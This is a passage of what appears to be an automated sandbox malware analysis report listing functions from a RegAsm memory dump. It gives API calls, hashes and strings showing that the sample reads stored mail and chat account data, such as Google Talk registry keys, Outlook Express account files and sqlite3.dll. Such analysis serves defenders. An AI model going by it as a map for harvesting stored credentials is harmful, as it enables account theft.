                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                      • API String ID: 3071782539-966475738
                                                                                                                                                                                                                      • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                                                                                      Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 445 410863-41088b UuidFromStringA * 2 446 4108dd 445->446 447 41088d-41088f 445->447 448 4108df-4108e2 446->448 447->446 449 410891-4108aa call 410827 447->449 451 4108af-4108b1 449->451 451->446 452 4108b3-4108b9 451->452 453 4108bb-4108bd 452->453 454 4108be-4108db memcpy CoTaskMemFree 452->454 453->454 454->448
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                      • API String ID: 1640410171-3316789007
                                                                                                                                                                                                                      • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                                                      • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                                                      Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                      • API String ID: 1886237854-620537770
                                                                                                                                                                                                                      • Opcode ID: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                                                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                                                      Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2054149589-0
                                                                                                                                                                                                                      • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                                                      Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                      • API String ID: 1366857005-1079885057
                                                                                                                                                                                                                      • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                                                      Function 00410DBB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFolderLibraryLoadPathSpecialVersion_mbscpymemset
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                      • API String ID: 218411198-2036018995
                                                                                                                                                                                                                      • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                                      Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                      • API String ID: 882979914-1578091866
                                                                                                                                                                                                                      • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                                                      Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                                                                                      • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                                      Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: 503c09cd7de9972ac8ba5625359fc448a9b0e456fd4c2f147f53c83827732b04
                                                                                                                                                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 503c09cd7de9972ac8ba5625359fc448a9b0e456fd4c2f147f53c83827732b04
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                                      Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                                      Function 00402A14 Relevance: 4.5, APIs: 3, Instructions: 49registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$Enummemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1615280680-0
                                                                                                                                                                                                                      • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                                                      • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                                                                                                                                                                                                                      Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                                      • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                                                                                      • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                                                      Function 00410B1E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                                                                                      • API String ID: 3677997916-1155512374
                                                                                                                                                                                                                      • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                                                      • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                                                                                                      Function 00406D01 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: eBD
                                                                                                                                                                                                                      • API String ID: 823142352-44267735
                                                                                                                                                                                                                      • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                                                      • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                                                                                                                                                                                                                      Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                                                      Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                      • API String ID: 520177685-3817206916
                                                                                                                                                                                                                      • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                                                      Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
